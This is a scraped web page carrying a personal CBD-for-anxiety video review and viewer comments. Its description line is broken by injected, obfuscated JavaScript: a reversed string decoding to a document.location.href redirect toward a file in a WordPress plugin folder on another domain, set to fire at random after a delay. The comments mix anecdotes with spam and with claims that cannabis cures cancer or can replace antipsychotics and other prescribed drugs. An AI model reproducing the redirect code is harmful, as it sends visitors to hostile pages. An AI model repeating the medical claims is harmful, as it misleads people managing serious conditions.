CBD OIL FOR ANXIETY | 2-WEEK Review & Side Effects


This product is honestly amazing, watch my updated reviews toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see how I’ve changed!!







☾INSTA: @eastcoastcreep
☀SNAP: @carladilauro
☾ theeastcoastcreep@gmail.com

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31 thoughts on “CBD OIL FOR ANXIETY | 2-WEEK Review & Side Effects”

  1. aaeaaeaae says:

    Have u failed a drug test?

  2. Jennifer Haley says:

    Check out these awesome CBD/RSHO products!!
    they have vapes, beauty products, oils and even gum!!
    Legal in all 50 states!!!

  3. kimberly E says:

    Hey! So are these cbd oils illegal for minors (under 18) to use? I'm 17 and my anxiety is at an all time high right now and my parents and I are looking for a natural solution (not a fan of prescription drugs) and I've heard good things about cbd 🙂 thx

  4. Matthew Fowler says:

    Thanks for your videos 🙂

  5. Vincenzo Scicutella says:

    your videos give me hope! thank you so much! 🙂

  6. magna116 says:

    drum beat sound in this video is unnecessary and annoying. sound like a heartbeat.

  7. Melissa McCash says:

    Hey! I'm working for this awesome wellness startup that is prepping to go public this summer, and we've been in such hypergrowth, we are looking for awesome Brand and Sales people to join our rocking team. You interested? Please comment back! (includes CBD OIL! #2 best selling in the nation) cbd oil is the best!!

  8. truth incommon says:

    I believe this is a good honest review, it was helpful to me, I am surprised of the dislikes, but, I totally understand having had the same problems and nothing prescribed by a dr. has really worked for me, and the side effects of those drugs are often worse then the benefits.

  9. Alice Steffens says:

    I have never hear a more specific and helpful cbd video!! We r clones lol. Mild bipolar anxiety depression mood immune system hydration all of the above. Perfect description keep posting!

  10. Alice Steffens says:

    America wants to keep us sick!! WHO WOULD HAVE THOUGHT THE CURE FOR CANCER!!!! Would be found in our lifetime. Wow. F&$% pharmaceutical companies

  11. James Andrews says:

    I love you, your amazing, think its amazing what cbd has done you. stuff the haters <3

  12. samuraineko3 says:

    We have legal CBD here in the UK but I'm scared to try it because of the whole "it's a drug thing" so I tried chamomile and that really helps with anxiety, it even helps with psychological symptoms like irrational thoughts. In the future I might give this a try, do you know if there are any known serioius side effects?

  13. I'm Only A Man And I Will Die Some Day says:

    What did you mean by "stupid breathing"?

  14. The14Th Berserker says:

    i have been using CBD for a while now, it definitely works, only problem is having schizophrenia it still gives me a "mind-altering" feeling visuals are typically stronger than what they usually are which ontop of all my other medications is horrible. But at least for sleep a little dose of CBD along with other anxiety medications it does help tremendously to put me to sleep, although there is still times, that it makes me paranoid and want to give into a anxiety attack. it's really a hit or miss product.

  15. Lea Lee - healthyteame says:

    I have been watching some of your vids and just subscribed! You should look into getting the actual prescription for CBD Cannabis and CBDCannabis oil, it is way more potent, you wouldn't have to use nearly as much. It is the actual Cannabis oil that has the real medicinal benefits….that is why in the states where it isn't legal everywhere people move states. That most likely wouldn't be the case if the completely legal hemp oil or hemp CBD worked as well or in the same fashion. I use the real prescription Medical CBD Cannabis/Oil Very High CBD very low THC no high and I know how amazing it is. CBD is CBD yes but the pharmaceutical grade cannabis again just way more potent….peace and 1 luv

  16. Devin Williams says:

    i brought cbd and i use the spray and the paste and i have the munchies and my eys people are saying i look high…..and i was laughing alot and thats not me ..like i took a hit of a blunt..i have pain thats my reason for taking it

  17. Amber Brown says:

    lol I love how you describe trouble breathing as "stupid breathing" and insomnia as "stupid sleeping". it made me giggle. I have anxiety & panic attacks & depression too so we gotta find the humor wherever we can

  18. slimgoody503 says:

    I really thought she had no arms

  19. Vee says:

    I have the same symptoms as you . So all you do is spray it in ur mouth and swallow it ?do you take it everyday? I would love your feedback

  20. Jacob Riegelsberger says:

    Such an awesome video! If you’re interested in learning more about the benefits of CBD Oil feel free to email me pmb.jake@gmail.com or visit my website Jacobtx.primemybody.com for product information and ordering! Stay healthy, well and in good spirits!

  21. organ4christ says:

    What time do u take your dose

  22. Rebecca Bryant says:

    I'm really considering cbd oil because I struggle from severe anxiety and depression. I'm willing to try it. my only question is for anyone who might know. does taking cbd oil effect birth control? like make it less effective?

  23. jg2cats says:

    CBD oil is legal in all 50 states. There is a prescription version but it contains more than the legally allowed THC content which is somewhere around 0.7% or 7% (can't remember which) in any case, thanks to your video I did a lot of research. CBD extracted from industrial hemp is legal and sold in stores and online like the brand you're using. The other requires and Rx and can only be gotten at an authorized medical marijuana establishment or authorized mail order supplier.
    The cleaner the growing process and extraction process (CO2) the better (consistent and stable) the end product. Read all ingredients. I'm allergic to coconut and some brands add coconut oil to achieve the concentration they want in their product. Wishing all much success with CBD.

  24. GettingInShape3000 says:

    The CBD Balm, Oral Spray and Capsules have changed my life. I went from taking anti-psychotics, benzos, nerve pain medication, and pain meds… to just the CBD products. I am now living without BigPharma's meds pumping through me and I feel sooo much better than I have in… 16years? I will swear by this product! Even got a T-Shirt for helping them with business by spreading the word of what this stuff has done for me and for others and could possibly do for them. =)

    I hope you are doing well. I too am Bi-Polar and have chronic anxiety. Depression "conquered". I understand the feelz.

  25. johnnyquest456 says:

    The first day I tried it I also experienced some cotton mouth and tiredness but the dry/numb mouth feeling went away in like an hour or so and the sleepiness wasn't anything unbearable just feels like you could use a cup of coffee or something lol. I used it because I also experience anxiety, mostly stress, and headaches. I felt really content and comfortable after my first drop and haven't had a bad migraine yet. I'm going to continue to use it.

  26. Teresa Nunez says:

    You say that you take 10mg, but the bottle you linked is 100mg per spray. Can you elaborate?

  27. Candice Wright says:

    I just received my plus CBD today, and took the expected dosage, 2sprays, but I don't really notice a difference, like I kinda do but I feel as if I'm tricking myself. Would I see better results after a week or so of using 🙂 Thanks in advance :p

  28. Matt Dupuis says:

    is hemp derived cbd less effective then marijuana derived cbd? I heard that somewhere but I mean they're the same family of plant so idk

  29. valpster says:

    So good for me to see another wired person. So helpful because you seem very verbally able to describe the thought process! started taking CBD myself this week. Sleep and anxiety getting to a better place.

  30. Marli Allen says:

    how many drops is 10mg

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